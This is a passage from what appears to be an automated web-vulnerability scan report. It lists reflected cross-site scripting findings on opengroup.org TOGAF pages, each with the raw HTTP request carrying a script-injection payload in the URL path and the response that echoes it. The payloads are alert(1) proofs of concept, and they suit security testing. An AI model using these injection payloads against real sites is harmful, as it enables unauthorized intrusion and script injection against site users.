Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architectureb1689--><script>alert(1)</script>e2a73383cc7/togaf8-doc/arch/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:29 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5255

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architectureb1689--><script>alert(1)</script>e2a73383cc7/togaf8-doc/arch/banner1.htm -->
...[SNIP]...

3.130. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Request

GET /architecture80c52"><script>alert(1)</script>f743f40b2e7/togaf8-doc/arch/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:23 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5252

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture80c52"><script>alert(1)</script>f743f40b2e7/togaf8-doc/arch/banner1.htm">
...[SNIP]...

3.131. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture/togaf8-doccd353--><script>alert(1)</script>471e5f4a359/arch/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:55 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5255

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doccd353--><script>alert(1)</script>471e5f4a359/arch/banner1.htm -->
...[SNIP]...

3.132. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Request

GET /architecture/togaf8-docc907b"><script>alert(1)</script>22f08924d21/arch/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:42 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5252

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-docc907b"><script>alert(1)</script>22f08924d21/arch/banner1.htm">
...[SNIP]...

3.133. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Request

GET /architecture/togaf8-doc3fff9<script>alert(1)</script>8559c6c8772/arch/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:50 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5246

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc3fff9<script>alert(1)</script>8559c6c8772/arch/banner1.htm<br>
...[SNIP]...

3.134. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Request

GET /architecture/togaf8-doc/arch3a31e<script>alert(1)</script>a9ecc41592c/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:07 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5246

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc/arch3a31e<script>alert(1)</script>a9ecc41592c/banner1.htm<br>
...[SNIP]...

3.135. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture/togaf8-doc/arch3206c--><script>alert(1)</script>b9fc947417/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:09 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5252

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doc/arch3206c--><script>alert(1)</script>b9fc947417/banner1.htm -->
...[SNIP]...

3.136. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Request

GET /architecture/togaf8-doc/arch7aea1"><script>alert(1)</script>a0a70911350/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:05 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5252

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-doc/arch7aea1"><script>alert(1)</script>a0a70911350/banner1.htm">
...[SNIP]...

3.137. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Request

GET /architecture/togaf8-doc/arch/banner1.htmb3d68<script>alert(1)</script>2e612c7e3a4 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:19 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5246

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htmb3d68<script>alert(1)</script>2e612c7e3a4<br>
...[SNIP]...

3.138. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture/togaf8-doc/arch/banner1.htmbd16a--><script>alert(1)</script>f6af9752da9 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:22 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5255

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doc/arch/banner1.htmbd16a--><script>alert(1)</script>f6af9752da9 -->
...[SNIP]...

3.139. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Request

GET /architecture/togaf8-doc/arch/banner1.htmb06e9"><script>alert(1)</script>c339ed24d73 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:17 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5252

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-doc/arch/banner1.htmb06e9"><script>alert(1)</script>c339ed24d73">
...[SNIP]...

3.140. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architectureb44de--><script>alert(1)</script>bcb67e2a8d5/togaf8-doc/arch/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:29 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5249

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architectureb44de--><script>alert(1)</script>bcb67e2a8d5/togaf8-doc/arch/toc2.html -->
...[SNIP]...

3.141. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Request

GET /architecture3e36c"><script>alert(1)</script>e067f9695a3/togaf8-doc/arch/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:23 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5246

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture3e36c"><script>alert(1)</script>e067f9695a3/togaf8-doc/arch/toc2.html">
...[SNIP]...

3.142. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Request

GET /architecture11be1<script>alert(1)</script>3e620815dc4/togaf8-doc/arch/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:24 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5240

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture11be1<script>alert(1)</script>3e620815dc4/togaf8-doc/arch/toc2.html<br>
...[SNIP]...

3.143. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture/togaf8-doc9e1f5--><script>alert(1)</script>b71016c3570/arch/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:55 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5249

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doc9e1f5--><script>alert(1)</script>b71016c3570/arch/toc2.html -->
...[SNIP]...

3.144. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Request

GET /architecture/togaf8-doca7e1c<script>alert(1)</script>1741215fdf5/arch/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:50 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5240

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doca7e1c<script>alert(1)</script>1741215fdf5/arch/toc2.html<br>
...[SNIP]...

3.145. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Request

GET /architecture/togaf8-doc21311"><script>alert(1)</script>f9f7ddebf6/arch/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:42 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5243

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-doc21311"><script>alert(1)</script>f9f7ddebf6/arch/toc2.html">
...[SNIP]...

3.146. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Request

GET /architecture/togaf8-doc/arch9a39f<script>alert(1)</script>f8f8cdf717/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:07 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5237

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
